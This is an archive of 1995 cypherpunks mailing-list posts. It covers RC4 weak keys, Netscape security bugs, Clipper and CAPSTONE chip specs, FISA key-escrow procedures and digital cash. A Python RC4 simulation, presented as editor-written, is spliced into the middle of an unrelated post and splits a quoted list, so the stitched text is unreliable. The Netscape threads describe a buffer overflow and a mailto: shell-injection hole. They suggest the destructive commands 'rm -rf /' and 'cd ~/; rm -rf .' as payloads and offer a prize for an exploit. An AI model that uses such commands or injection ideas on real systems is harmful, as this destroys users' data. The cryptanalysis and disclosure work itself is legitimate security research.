The usefulness of weak keys does increase if the opponent is satisfied with recovering only a percentage of the keys subjected to analysis. Given a known generator output which includes the first generated byte, one could assume that the key was weak and search only the weak keys which would generate the known initial byte. Since 1 in 256 keys is weak, and there is a 13.8% chance that the assumed value of K[2] will be correct, there is only a 0.054% chance of finding the key this way. However, you have reduced the search space by 16 bits due to the assumed relationship between K[0] and K[1] and the assumed value of K[2], so the work factor per key recovered is reduced by a factor of 35, which is equivalent to reducing the effective key length by 5.1 bits.

However in particular circumstances, the known relationships between weak keys may provide a much more significant reduction in workload. The remainder of this section describes an attack which, although requiring very specific conditions, illustrates the potential threat.

As a stream cipher, a particular RC4 key can only be used once. When multiple communications sessions are required, some mechanism must be provided for generating a new session key each time. Let us suppose that an implementation chose the simple method of incrementing the previous session key to get the new session key, and that the session key was treated as a "little endian" (least significant byte first) integer for this purpose. We now have the interesting situation that the session keys will "cycle through" weak keys in a pattern which repeats every 2^16 keys:

   00 00 00 ...   Weak
                  (510 non-weak keys)
   FF 01 00 ...   Weak
                  (254 non-weak keys)
   FE 02 00 ...   Weak
                  (254 non-weak keys)
   FD 03 00 ...   Weak
   ...
   01 FF 00 ...   Weak
                  (254 non-weak keys)
   00 00 01 ...   Weak
                  (510 non-weak keys)
   FF 01 01 ...   Weak

   (Least significant byte on the left)

Now while an isolated weak key cannot be identified simply from a known generator output, this cycle of weak keys at known intervals can be identified using statistical techniques since each of the weak keys has a higher than expected probability of generating the _same_ initial byte. This means that an opponent who knew the initial generated bytes of about 2^16 session keys could identify the weak keys, and would also be able to locate the 510-key gap between successive cycles of weak keys (although not precisely).

Since the 510-key gap occurs immediately following a key which begins with 00 00, the opponent not only knows that the keys are weak, but also knows the first two bytes of each key. The third byte of each key can be guessed from the first output byte generated by the key, with a 13.8% chance of a correct guess. Assuming that the "510-key gap" is narrowed down to 1 of 8 weak keys, the attacker can search a key space which is 24 bits less than the size of the session keys, with a 13.8%/8 chance of success, effectively reducing the key space by approximately 18 bits.

Although this particular attack depends on a very specific set of circumstances, it is likely that other RC4 based cryptosystems in which there are linear relationships between successive session keys could be vulnerable to similar attacks.

5. RECOMMENDATIONS

The attacks described in this algorithm result from inadequate "mixing" of key bytes during the generation of the RC4 state table. The following measures could be taken to strengthen cryptosystems based on the RC4 algorithm:

(a) After initializing the algorithm, generate and discard a number of bytes. Since the algorithm used to generate bytes also introduces additional non-linear dependencies into the state table, this would make analysis more difficult.

(b) In systems which require multiple session keys, ensure that session keys are not linearly related to each other.

(c) Avoid using the weak keys described.

6. CONCLUSION

This preliminary analysis of RC4 shows that the algorithm is vulnerable to analytic attacks based on statistical analysis of its state table. It is likely that a more detailed analysis of the algorithm will reveal more effective ways to exploit the weaknesses described.

Andrew Roos

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMGLAk2atuqa4OR+lAQGYJQQA1W2r/giH1iPxeLRjooPEvAJJO2GHrBNy
h1fjHhPf6uBhBapEyZfN5utaUZYkkz/3tXJQC1p+17XwAJHGxb6kapHl3tAf2k5B
P7C034fo8WIOmam1GQqlG3c1MPjCvkNY02NEkYAmNtcwKMP96QgDMCbvS0kn55WE
L1GOWMVYqO4=
=iogI
-----END PGP SIGNATURE-----

From dl at hplyot.obspm.fr Fri Sep 22 03:10:38 1995
From: dl at hplyot.obspm.fr (Laurent Demailly)
Date: Fri, 22 Sep 95 03:10:38 PDT
Subject: Netscape to end Linux support?
In-Reply-To: <199509212125.RAA00188@hoopsnake.cjs.net>
Message-ID: <9509221008.AA18570@hplyot.obspm.fr>

Jeff Simmons writes:
> > And the sad part is that now that they have announced that they are
> > dropping their unofficial Linux support, I really want to hurt
> > Netscape badly.
> > Sigh.
> Anyone got a pointer to this announcement?
> Damn! Just when I was starting to like them ...

Hmm, I was also thinking good about responsiveness on the security issue (though the way they behave regarding html extensions is still not fair imo, but that's another debate), and I have modified my netscape security page accordingly, but, dropping Linux as the list of UNIX supported host is certainly not a good thing at all, I urge/pray/suggest... that listening Netscape folks here try to put it back, PLEASE (It is not that difficult to compile under linux is it ?)

(source : http://www.netscape.com/comprod/products/navigator/version_2.0/datasheet.html
[...]
SUPPORTED PLATFORMS
[...]
UNIX: Digital Equipment Corp.
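As an added illustration of Andrew Roos's draft above (this is editor-written code, not part of the draft and not the RC4 source it cites), the following simulation implements the key schedule from the posted C code, measures the state-table bias of result B and the first-byte bias of result C for the weak class K[0] + K[1] == 0 (mod 256), and then applies recommendation (a), discarding initial output, to show the correlation disappearing. The 80-bit (10-byte) key length and the trial counts are assumptions chosen to match the draft's experiment.

```python
"""Simulation of the RC4 state-table bias (result B) and weak-key class
(result C) from Roos's draft.  Added example, not part of the posting;
the 10-byte key length and trial counts are my choices."""
import random


def rc4_ksa(key):
    """Key scheduling exactly as in the posted C code: the table starts as
    0..255 and line 7's swap is the only operation that modifies it."""
    state = list(range(256))
    index2 = 0
    for counter in range(256):
        index2 = (key[counter % len(key)] + state[counter] + index2) % 256
        state[counter], state[index2] = state[index2], state[counter]
    return state


def rc4_stream(state, count, drop=0):
    """Emit `count` stream bytes from a scheduled table, first discarding
    `drop` bytes (Roos's recommendation (a)).  Works on a copy."""
    state = state[:]
    x = y = 0
    out = []
    for i in range(drop + count):
        x = (x + 1) % 256
        y = (state[x] + y) % 256
        state[x], state[y] = state[y], state[x]
        if i >= drop:
            out.append(state[(state[x] + state[y]) % 256])
    return out


def likely_state_value(key, element):
    """Result B: S[E] is most likely X(E) + E(E+1)/2, where X(E) is the
    sum of key bytes 0..E with the key wrapping around."""
    total = sum(key[i % len(key)] for i in range(element + 1))
    return (total + element * (element + 1) // 2) % 256


def is_weak_key(key):
    """Condition of result C: K[0] + K[1] == 0 (mod 256)."""
    return (key[0] + key[1]) % 256 == 0


def predicted_first_byte(key):
    """Result C: first output byte is usually K[2] + 3, with the two
    special cases the draft notes for K[0] == 1 and K[0] == 2."""
    if key[0] == 1:
        return (key[2] + 2) % 256
    if key[0] == 2:
        return (key[2] + 1) % 256
    return (key[2] + 3) % 256


def random_key(rng, key_len=10, weak=False):
    """Uniformly random key; with `weak`, K[1] is forced so that the key
    is in the weak class, otherwise K[1] is redrawn until it is not."""
    key = [rng.randrange(256) for _ in range(key_len)]
    if weak:
        key[1] = (-key[0]) % 256
    else:
        while is_weak_key(key):
            key[1] = rng.randrange(256)
    return key


def likely_value_rate(element, trials=10000, seed=1):
    """Fraction of random keys whose scheduled S[element] equals the value
    predicted by B; compare with the draft's table (37.0% for element 0,
    30.9% for element 8)."""
    rng = random.Random(seed)
    hits = 0
    for _ in range(trials):
        key = random_key(rng)
        if rc4_ksa(key)[element] == likely_state_value(key, element):
            hits += 1
    return hits / trials


def first_byte_hit_rate(weak, trials=10000, drop=0, seed=2):
    """Fraction of keys whose first emitted byte matches predicted_first_byte.
    Weak keys should score about 13.8%; non-weak keys, or weak keys once
    `drop` initial bytes are thrown away, should sit near 1/256 (0.39%)."""
    rng = random.Random(seed)
    hits = 0
    for _ in range(trials):
        key = random_key(rng, weak=weak)
        first = rc4_stream(rc4_ksa(key), 1, drop=drop)[0]
        if first == predicted_first_byte(key):
            hits += 1
    return hits / trials


if __name__ == "__main__":
    print("P(S[0] == predicted):", likely_value_rate(0))
    print("P(S[8] == predicted):", likely_value_rate(8))
    print("weak keys, byte 0 == K[2]+3:", first_byte_hit_rate(weak=True))
    print("non-weak keys, same guess:", first_byte_hit_rate(weak=False))
    print("weak keys after dropping 256 bytes:",
          first_byte_hit_rate(weak=True, drop=256))
```

The first two rates reproduce the opening entries of the draft's table, the third lands in the 12-16% band it reports, and the last shows why discarding the leading keystream is the cheap fix.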
Alpha (OSF/1 2.0)
Hewlett-Packard 700-series (HP-UX 9.03)
IBM RS/6000 AIX 3.2
Silicon Graphics (IRIX 5.2)
Sun SPARC (Solaris 2.4, SunOS 4.1.3)
386/486/Pentium (BSDI)
)

Or maybe it is just a missing item in the list ? [i hope!]

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept
Saddam Hussein Qaddafi [Hello to all my fans in domestic surveillance] genetic Cocaine radar Ortega

From dl at hplyot.obspm.fr Fri Sep 22 03:15:46 1995
From: dl at hplyot.obspm.fr (Laurent Demailly)
Date: Fri, 22 Sep 95 03:15:46 PDT
Subject: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509220612.CAA11441@clark.net>
Message-ID: <9509221014.AA18627@hplyot.obspm.fr>

Ray Cromwell writes:
>
> I've found a Netscape bug which I suspect is a buffer overflow and
> may have the potential for serious damage. If it is an overflow bug,
> then it may be possible to infect every computer which accesses a web
> page with Netscape. To see the bug, create an html file containing
> the following:
[...]

The shortest host length I've found to cause seg fault is 356 (yes, and not 256, 256+100 if you prefer :))

You can have a look at http://hplyot.obspm.fr/~dl/netscapesec/ for a 'demo' (click to crash)

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept
Legion of Doom SEAL Team 6 Cocaine class struggle AK-47 jihad fissionable

From futplex at pseudonym.com Fri Sep 22 03:38:00 1995
From: futplex at pseudonym.com (Futplex)
Date: Fri, 22 Sep 95 03:38:00 PDT
Subject: Project: a standard cell random number generator
In-Reply-To: <9509202150.AA08164@toad.com>
Message-ID: <9509221037.AA08096@cs.umass.edu>

John Gilmore writes:
> In this sense, NSA ought to be *encouraging* Intel and
> IBM and Motorola to put "generate random bits" instructions into
> their instruction sets...
Does Tessera include any form of hardware RNG ?

-Futplex

From futplex at pseudonym.com Fri Sep 22 03:43:58 1995
From: futplex at pseudonym.com (Futplex)
Date: Fri, 22 Sep 95 03:43:58 PDT
Subject: RNG Resource FAQ (was Re: "random" number seeds vs. Netscape)
In-Reply-To: <30609562.15FB@netscape.com>
Message-ID: <9509221043.AA08133@cs.umass.edu>

Perry Metzger writes:
# You might want to read RFC 1750,

Phil Karlton writes:
> Did that. It talks about a lot of the pitfalls. Unfortunately it does not
> address (nor can it realistically be expected to address) details of what
> to look for on a particular version of an OS running on some particular
> platform.

Can someone point me to a compilation of such information ? If not, I'm definitely interested in starting a Web page to chronicle recommendations about good, bad, and questionable random and pseudo-random sources for specific architectures and operating systems. (It could also include information on special-purpose plug-in hardware RNGs.)

-Futplex

From jim at acm.org Fri Sep 22 04:10:47 1995
From: jim at acm.org (Jim Gillogly)
Date: Fri, 22 Sep 95 04:10:47 PDT
Subject: Project: a standard cell random number generator
In-Reply-To: <9509221037.AA08096@cs.umass.edu>
Message-ID: <199509221110.EAA03110@mycroft.rand.org>

> futplex at pseudonym.com (Futplex) writes:
> John Gilmore writes:
> > In this sense, NSA ought to be *encouraging* Intel and
> > IBM and Motorola to put "generate random bits" instructions into
> > their instruction sets...
> Does Tessera include any form of hardware RNG ?

Yes. Here's a released CAPSTONE spec sheet. I don't expect an attack like the one on Netscape to work there.

Jim Gillogly
Sterday, 1 Winterfilth S.R. 1995, 11:07

------- Forwarded Message

Date: Fri, 30 Apr 93 10:11:03 EDT
From: Clipper Chip Announcement
Organization: National Institute of Standards and Technology (NIST)
Posted-Date: Fri, 30 Apr 93 10:11:03 EDT
Subject: Capstone Chip technology information

CAPSTONE CHIP TECHNOLOGY

CAPSTONE is an NSA developed, hardware oriented, cryptographic device that implements the same cryptographic algorithm as the CLIPPER chip. In addition, the CAPSTONE chip includes the following functions:

1. The Digital Signature Algorithm (DSA) proposed by NIST as a Federal Information Processing Standard (FIPS);
2. The Secure Hashing Algorithm (SHA) recently approved as FIPS 180;
3. A Key Exchange Algorithm based on a public key exchange;
4. A general purpose exponentiation algorithm;
5. A general purpose, random number generator which uses a pure noise source.

The Key exchange Algorithm is programmable on the chip and uses functions 1-2 and 4-5 above.

Prototypes of the CAPSTONE chip are due the last week in April. The chips are expected to sell for $85.00 each (programmed). The first CAPSTONE chips are to be installed in PCMCIA electronic boards and used for the PMSP program for the security of the Defense Messaging System.

The CAPSTONE chip is big, complex and powerful. Over 850 megabytes are required by the automated design system to define the functions of the chip. VLSI Technology is fabricating the chip, and MYKOTRONX is designing and testing the chip.

1. What are the power requirements of the CAPSTONE chip? Will they fit the power requirements of battery-operated, hand held devices?

The CAPSTONE chip requires a 5 volt DC voltage source. Power ratings are currently estimated at 3.5 milliamps per MHz, i.e. at 10 Mhz and 5 volt DC, power consumed is 175 milliwatts. These estimates will be refined as data are taken into the actual chips. In comparison, the CLIPPER chip consumes approximately 150 milliwatts at 5 volts DC and 10 MHz.
As you can see, both chips fall within the power requirements of hand held, battery-operated devices.

2. Will the CAPSTONE chip incorporate the key escrow features of the CLIPPER chip?

Yes, it will.

3. When will CAPSTONE be announced and available?

Prototypes of the CAPSTONE chip are due the end of this month. We ask that you contact the manufacturer, Mykotronx Inc., for further information concerning the timetable for availability of CAPSTONE.

4. Is the Department of Defense working now to incorporate CAPSTONE in the Pre-message Security Protocol?

Yes

5. Will CAPSTONE meet the design requirements of a PCMCIA card that combines voice and/or data communications with encryption capabilities?

Yes

6. Will CAPSTONE use the Digital Signature Standard? What kind of key management scheme will be employed in the CAPSTONE chip? Will CAPSTONE allow the use of RSA public-key encryption in conjunction with, or as an alternative to, the DSS? If RSA is implemented on the CAPSTONE chip, will the key escrow feature function?

CAPSTONE implements the Digital Signature Algorithm (DSA), proposed by NIST as a Federal Information Processing Standard (FIPS), to perform the digital signature functions. Key management is handled by an algorithm based on a public-key exchange technique. The CAPSTONE chip does not implement RSA.

4/30/93

------- End of Forwarded Message

From rah at shipwright.com Fri Sep 22 05:03:52 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Fri, 22 Sep 95 05:03:52 PDT
Subject: Patents and trade secrets was: Encryption algorithms used in PrivaSoft
Message-ID:

Historical example time...

>(0) Alice invents a snaffleblort.

Some Other Guy invented telephone

>(1) Bob invents a snaffleblort.

A.G. Bell invented telephone.

>(2) Bob files for a patent on a snaffleblort.

A.G. Bell files 6 hours earlier.

Actually happened. We know what happened...
----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From perry at piermont.com Fri Sep 22 05:25:00 1995 From: perry at piermont.com (Perry E. Metzger) Date: Fri, 22 Sep 95 05:25:00 PDT Subject: Another Netscape Bug (and possible security hole) In-Reply-To: <199509220612.CAA11441@clark.net> Message-ID: <199509221224.IAA03734@frankenstein.piermont.com> Ray; This is evidence that, as I said, they have plenty of buffer overflow bugs. So much for the protestations to the contrary. My suspicion is that if you used a customized HTTPd that allowed you to shove arbitrary data into your URL, you could get the victim's copy of netscape to fandango on the stack and do nicely arbitrary things to the victim -- like executing "cd ~/; rm -rf ." A "Hack Netscape" T-Shirt for the first person (Ray, here is your chance!) to find an exploit using this! Though your demo shouldn't do anything bad. Does everyone think Ray should get a shirt no matter what? Perry Ray Cromwell writes: > > I've found a Netscape bug which I suspect is a buffer overflow and > may have the potential for serious damage. If it is an overflow bug, > then it may be possible to infect every computer which accesses a web > page with Netscape. To see the bug, create an html file containing > the following: > > a buffer size of 256 characters is good enough to hold any domain" > > It's definately the domain that's causing it, and not the length of > the URL or the data after the domain name. > > I also tried to overflow some netscape servers using similar techniques > (and shell metacharacters in all sorts of URLs), to no avail. I suspect > a similar attack may work against the Netscape Server if it is proxying. 
>
>
> Does anyone have a disassembly of Netscape, or more specifically,
> a disassembly of the URL parse and domain lookup routines? I'd be
> happy to collaborate and "Hack Netscape" ;-)
>
>
> Happy Hacking,
> -Ray
>
>

From perry at piermont.com Fri Sep 22 05:27:02 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Fri, 22 Sep 95 05:27:02 PDT
Subject: Netscape bug update
In-Reply-To: <199509220626.CAB16453@clark.net>
Message-ID: <199509221226.IAA03742@frankenstein.piermont.com>

I've decided that I'll pay Sameer for the shirt for Ray, regardless. However, if someone else produces the exploit first, they should get one, too!

.pm

Ray Cromwell writes:
>
> I just verified in GDB using a stack trace that the Netscape overflow
> bug I mentioned is indeed a static stack buffer overflow. It trashes
> the stack.
>
> What this means is that in theory, it is possible to get a simple
> URL, if clicked on, to execute some code on someone's browser.
>
> Now the hard work begins...
>
>
> Happy Hacking,
> -Ray
>
>

From nsb at nsb.fv.com Fri Sep 22 05:29:28 1995
From: nsb at nsb.fv.com (Nathaniel Borenstein)
Date: Fri, 22 Sep 95 05:29:28 PDT
Subject: first virtual "security" (!!) (was Re: Security Flaw Is Discovered InSoftware Used in Shopping)
In-Reply-To: <199509220137.LAA12354@sweeney.cs.monash.edu.au>
Message-ID:

Excerpts from mail.fv: 22-Sep-95 Re: first virtual "security.. Jiri Baum at sweeney.cs.mon (1560*)

> > >financial insecurity never was a problem as
> > >long as it remains under a small %.
> >
> > This is an amazing statement, Laurent.

> It's not an amazing statement. As long as the cost of insecurity is
> less than cost of security, there's no problem.

I think the basic confusion here is precisely about the cost. The cost of having one credit card stolen is small. The cost of having millions stolen at once is *astronomical*. It really could bring down the whole credit card system, if that was the criminal's goal.
My concern is about schemes in which the compromise of the cryptographic algorithms or software leads to a scenario in which one criminal steals millions of credit cards. In such a scenario, the cost of insecurity is unacceptably high.

> Okay, so what's stopping you from starting right now with PGP?
> You could simply have that as an alternative to the current system
> (on a per-ID basis, ie new customers specify PGP or not).
> Quite a few people both have PGP and would think well of you if you
> started using it.
> How about "The safest Internet payment system just got safer."?

We're definitely moving in this direction. It's more complicated than you make it sound, though. Personally, I don't want to use any cryptography without an explicit, clear, policy and mechanism for key expiration and key lifetimes. The risk of key compromise is directly proportional to the key lifetime. PGP today -- which we use very heavily internal to FV -- is not well-equipped for dealing with key management issues on a scale of millions of users.

Now, having said that... we're currently planning to deploy FV version 2 before the end of the year. Version 2 *will* include the first use of PGP in the FV system, but it will NOT work the way you probably expect. Stay tuned! -- Nathaniel

--------
Nathaniel S. Borenstein | When privacy is outlawed,
Chief Scientist, First Virtual Holdings | only outlaws will have privacy!
FAQ & PGP key: nsb+faq at nsb.fv.com | SUPPORT THE ZIMMERMANN DEFENSE FUND!
---VIRTUAL YELLOW RIBBON-->> zldf at clark.net

From bianco at itribe.net Fri Sep 22 05:30:10 1995
From: bianco at itribe.net (David J.
Bianco)
Date: Fri, 22 Sep 95 05:30:10 PDT
Subject: Netscape bug update
In-Reply-To: <199509220626.CAB16453@clark.net>
Message-ID: <199509221227.IAA22985@gatekeeper.itribe.net>

On Sep 22, 2:26, Ray Cromwell sent the following to the NSA's mail archives:
> Subject: Netscape bug update
||
|| I just verified in GDB using a stack trace that the Netscape overflow
|| bug I mentioned is indeed a static stack buffer overflow. It trashes
|| the stack.
||
|| What this means is that in theory, it is possible to get a simple
|| URL, if clicked on, to execute some code on someone's browser.
||
|| Now the hard work begins...
||

This is a new feature of Netscape 2.0, part of the Java package I believe... ;-)

--
==========================================================================
David J. Bianco | Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc. | Phone: (804) 446-9060 Fax: (804) 446-9061
Suite 1700, World Trade Center | email:
Norfolk, VA 23510 | URL : http://www.itribe.net/~bianco/

From nobody at REPLAY.COM Fri Sep 22 05:30:42 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Fri, 22 Sep 95 05:30:42 PDT
Subject: Project: a standard cell random number generator
Message-ID: <199509221230.OAA06528@utopia.hacktic.nl>

These supplement JG's post on CAPSTONE -- which is itself available with related crypto papers at csrc.ncsl.gov:

------------------

URL: http://csrc.ncsl.nist.gov/nistgen/clip.txt

CLIPPER CHIP TECHNOLOGY

CLIPPER is an NSA developed, hardware oriented, cryptographic device that implements a symmetric encryption/decryption algorithm and a law enforcement satisfying key escrow system. While the escrow management system design is not completely designed, the cryptographic algorithm (SKIPJACK) is completely specified (and classified SECRET). The cryptographic algorithm (called CA in this paper) has the following characteristics:

1. Symmetric, 80-bit key encryption/decryption algorithm;
2.
Similar in function to DES (i.e., basically a 64-bit code book transformation that can be used in the same four modes of operation as specified for DES in FIPS 81);
3. 32 rounds of processing per single encrypt/decrypt operation;
4. Design started by NSA in 1985; evaluation completed in 1990.

The CLIPPER CHIP is just one implementation of the CA. The CLIPPER CHIP designed for the AT&T commercial secure voice products has the following characteristics:

1. Functions specified by NSA; logic designed by MYKOTRONX; chip fabricated by VLSI, Inc.; manufactured chip programmed (made unique) by MYKOTRONX to security equipment manufacturers willing to follow proper security procedures for handling and storage of the programmed chip; equipment sold to customers;
2. Resistant to reverse engineering against a very sophisticated, well funded adversary;
3. 15-20 MB/S encryption/decryption constant throughout once cryptographic synchronization is established with distant CLIPPER Chip;
4. The chip programming equipment writes (one time) the following information into a special memory (called VROM or VIA-Link) on the chip:
   a. (unique) serial number
   b. (unique) unit key
   c. family key
   d. specialized control software
5. Upon generation (or entry) of a session key in the chip, the chip performs the following actions:
   a. Encrypts the 80-bit session key under the unit key producing an 80-bit intermediate result;
   b. Concatenates the 80-bit result with the 25-bit serial number and a 23-bit authentication pattern (total of 128 bits);
   c. Enciphers this 128 bits with family key to produce a 128-bit cipher block chain called the Law Enforcement Field (LEF);
   d. Transmits the LEF at least once to the intended receiving CLIPPER chip;
   e. The two communicating CLIPPER chips use this field together with a random IV to establish Cryptographic Synchronization.
6. Once synchronized, the CLIPPER chips use the session key to encrypt/decrypt data in both directions;
7.
The chips can be programmed to not enter secure mode if the LEF field has been tampered with (e.g., modified, superencrypted, replaced);
8. CLIPPER chips will be available from a second source in the future;
9. CLIPPER chips will be modified and upgraded in the future;
10. CLIPPER chips presently cost $16.00 (unprogrammed) and $26.00 (programmed).

4/30/93

-------------------

URL: http://csrc.ncsl.nist.gov/nistnews/esc_key2.txt

February 4, 1994

AUTHORIZATION PROCEDURES FOR RELEASE OF ENCRYPTION KEY COMPONENTS IN CONJUNCTION WITH INTERCEPTS PURSUANT TO FISA

The following are the procedures for the release of escrowed key components in conjunction with lawfully authorized interception of communications encrypted with a key-escrow encryption method. These procedures cover all electronic surveillance conducted pursuant to the Foreign Intelligence Surveillance Act (FISA), Pub. L. 95-511, which appears at Title 50, U.S. Code, Section 1801 et seq.

1) In each case there shall be a legal authorization for the interception of wire and/or electronic communications.

2) In the event that federal authorities discover during the course of any lawfully authorized interception that communications encrypted with a key-escrow encryption method are being utilized, they may obtain a certification from an agency authorized to participate in the conduct of the interception, or from the Attorney General of the United States or designee thereof.
Such certification shall (a) identify the agency participating in the conduct of the interception and the person providing the certification; (b) certify that necessary legal authorization has been obtained to conduct electronic surveillance regarding these communications; (c) specify the termination date of the period for which interception has been authorized; (d) identify by docket number or other suitable method of specification the source of the authorization; (e) certify that communications covered by that authorization are being encrypted with a key-escrow encryption method; (f) specify the identifier (ID) number of the key-escrow encryption chip providing such encryption; and (g) specify the serial (ID) number of the key-escrow decryption device that will be used by the agency participating in the conduct of the interception for decryption of the intercepted communications.

4) This certification shall be submitted to each of the designated key component escrow agents. If the certification has been provided by an agency authorized to participate in the conduct of the interception, a copy shall be provided to the Department of Justice, Office of Intelligence Policy and Review. As soon as possible, an attorney associated with that office shall provide each of the key component escrow agents with written confirmation of the certification.

5) Upon receiving the certification, each key component escrow agent shall release the necessary key component to the agency participating in the conduct of the interception. The key components shall be provided in a manner that assures they cannot be used other than in conjunction with the lawfully authorized electronic surveillance for which they were requested.

6) Each of the key component escrow agents shall retain a copy of the certification, as well as the subsequent written confirmation of the Department of Justice, Office of Intelligence Policy and Review.
7) Upon, or prior to, completion of the electronic surveillance phase of the investigation, the ability of the agency participating in the conduct of the interception to decrypt intercepted communications shall terminate, and such agency may not retain the key components.

8) The Department of Justice shall, in each such case, (a) ascertain the existence of authorizations for electronic surveillance in cases for which escrowed key components have been released; (b) ascertain that key components for a particular key-escrow encryption chip are being used only by an agency authorized to participate in the conduct of the interception of communications encrypted with that chip; and (c) ascertain that, no later than the completion of the electronic surveillance phase of the investigation, the ability of the agency participating in the conduct of the interception to decrypt intercepted communications is terminated.

9) Reports to the House Permanent Select Committee on Intelligence and the Senate Select Committee on Intelligence, pursuant to Section 108 of FISA, shall, with respect to any order for authorized electronic surveillance for which escrowed encryption components were released and used for decryption, specifically note that fact.

These procedures do not create, and are not intended to create, any substantive rights for individuals intercepted through electronic surveillance, and noncompliance with these procedures shall not provide the basis for any motion to suppress or other objection to the introduction of electronic surveillance evidence lawfully acquired.

------------------

From perry at piermont.com Fri Sep 22 05:36:15 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Fri, 22 Sep 95 05:36:15 PDT
Subject: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509220715.DAA27920@clark.net>
Message-ID: <199509221236.IAA03762@frankenstein.piermont.com>

Ray Cromwell writes:
> THIS IS A SERIOUS BUG! [...]
> [I hear Perry in the background groaning and muttering "I told you so"]

Of course I told you so. I knew what I was saying when I mentioned buffer overflows being a big problem in code written by the NCSA team, most of whom went over to Netscape. When at NCSA, they showed very little capacity to learn this lesson no matter how many cracks occurred. They always just tried to kludge around the thing instead of fixing it.

When I write security oriented code, I outright ban the use of certain C library calls.

> These buffer overflow bugs should be taught in every programming
> 101 course along with fencepost errors.
>
> I'm not even sure if I want to write the obligatory program to exploit
> the hack given that some malicious jerk would probably use it
> on his home page to attack people.

The problem is that if you don't produce a (benign) exploit people aren't going to take it seriously enough.

Perry

From perry at piermont.com Fri Sep 22 05:43:45 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Fri, 22 Sep 95 05:43:45 PDT
Subject: Another Netscape Bug (and possible security hole)
In-Reply-To: <43tpv8$rom@tera.mcom.com>
Message-ID: <199509221243.IAA03781@frankenstein.piermont.com>

Jeff Weinstein writes:
> OK, Perry was right, and it was wrong of me to argue with him based
> only on the code that I have personally seen. As we have already
> determined, I have not reviewed every line of code in netscape.
>
> Not that I want to divert attention away from netscape(OK, maybe I
> do :-) ), but does this bug exist in any other common browser?

Probably in Mosaic, though not necessarily in the same place. It's a case of the same programmers making the same mistakes over and over again.

I don't believe the Sun Java stuff would suffer from it, although I fear Java a great deal.

Perry

From perry at piermont.com Fri Sep 22 05:48:01 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Fri, 22 Sep 95 05:48:01 PDT
Subject: YET ANOTHER BAD NETSCAPE HOLE!
In-Reply-To: <199509220830.EAA13828@clark.net>
Message-ID: <199509221247.IAA03798@frankenstein.piermont.com>

It's hardly surprising to me. Look at the link list on any dynamically linked version of netscape and you'll see lots of calls that look very suspicious. I keep telling people this sort of thing and no one at Netscape listens, although I believe that we may have made a couple of converts in the firm now.

Perry

Ray Cromwell writes:
>
> > On the bright side, mailto: hyperlinks containing extra-long domain names
> > seem to be handled comparatively safely in both Netscape and Mosaic.
> > (Perhaps they just have longer buffers ? ;)
>
> Good question. My guess is, Netscape doesn't do any processing on the
> mailto: hyperlink at all, but merely passes it to a real mail delivery
> agent like Sendmail (or it uses MAPI under Win'95). Which begs
> the question, if Netscape is executing an external delivery agent,
> there may be the possibility of sneaking an attack in there and getting
> the shell to execute something.
>
> Hmm, let me try something.
>
>
> WOW!! Unbelievable! Stop the presses! I Can't believe no one ever discovered
> this before! Try a page with the following URL
>
> test
>
> Muahaha! Yet another security hole! Clicking on this mailto brings up
> an xterm on my machine! Simply change the xterm& to "rm -rf /" and
> bingo!
>
>
> Sheesh. I better stop before I am on Netscape's most hated list.
>
>
> -Ray
>
>

From perry at piermont.com Fri Sep 22 05:57:45 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Fri, 22 Sep 95 05:57:45 PDT
Subject: Project: a standard cell random number generator
In-Reply-To: <199509221110.EAA03110@mycroft.rand.org>
Message-ID: <199509221257.IAA03853@frankenstein.piermont.com>

Jim Gillogly writes:
>
> futplex at pseudonym.com (Futplex) writes:
> > Does Tessera include any form of hardware RNG ?
>
> Yes. Here's a released CAPSTONE spec sheet.
That probably means that this sort of thing *can* be made cost effective on ordinary chips. Now we have to get Tim to lobby Intel to put RNGs on the P7 chip :-)

Perry

From rah at shipwright.com Fri Sep 22 06:23:41 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Fri, 22 Sep 95 06:23:41 PDT
Subject: e$: Non-Repudiation
Message-ID:

Dr. May said:

>the
>"ontology" of digital money, the instruments and forms it can take, are
>_impoverished_ compared to the real world.

Ah... Someone's playing my song... Sorry I took so long, but I wanted to give this excellent post some serious attention, which is hard to come by when you're a person like me (praise the lord and pass the Ritalin ;-) ).

>In my eight years of following digital cash work, I've been struck with how
>little _economics_ enters the fray.

I think you're right, Tim. More and more people are finally realizing that digital commerce *is* cryptography: cryptography as it's applied to economics on a network of microprocessors. After all, Netscape plans to make its money on servers, most important, its commerce servers, the servers that require the most cryptography.

A major leader on this front, to my mind -- that is, someone who has been barking on the end of his chain ;-) the longest and loudest about all this, and who has gone out and *learned* how the clearing of transactions happens in the capital markets and elsewhere -- is Eric Hughes. Eric, who, along with Tim May, founded this group to begin with, who has worked with David Chaum, and who designed and built the first anonymous remailers. One of the reasons we don't see much of Eric around here these days is because he's out there putting some rubber to the road in his consulting business, where he's focusing on the very issue of cryptography and its applications to digital commerce, and I wish him well.

That is *not* to slight others in this group who are also thinking about this stuff. Not at all.
In addition, most of us are looking at other issues in cryptography, like remailers, like keeping the state out of our face, like pithing SSL, and, frankly, most of the rest of us are too busy making a living to do anything but lurk here. Cryptography is huge, and digital commerce is a small conceptual subset of the whole field, no matter how important some of us think it is. Nonetheless, the fact that both of the founders of this group are focusing on cryptographic financial objects and/or their network infrastructure speaks volumes about its importance anyway.

Having laid down that as covering fire ;-), let's talk about creating an ecosystem of autonomous financial objects on public networks, and why I think that Tim's post is particularly important.

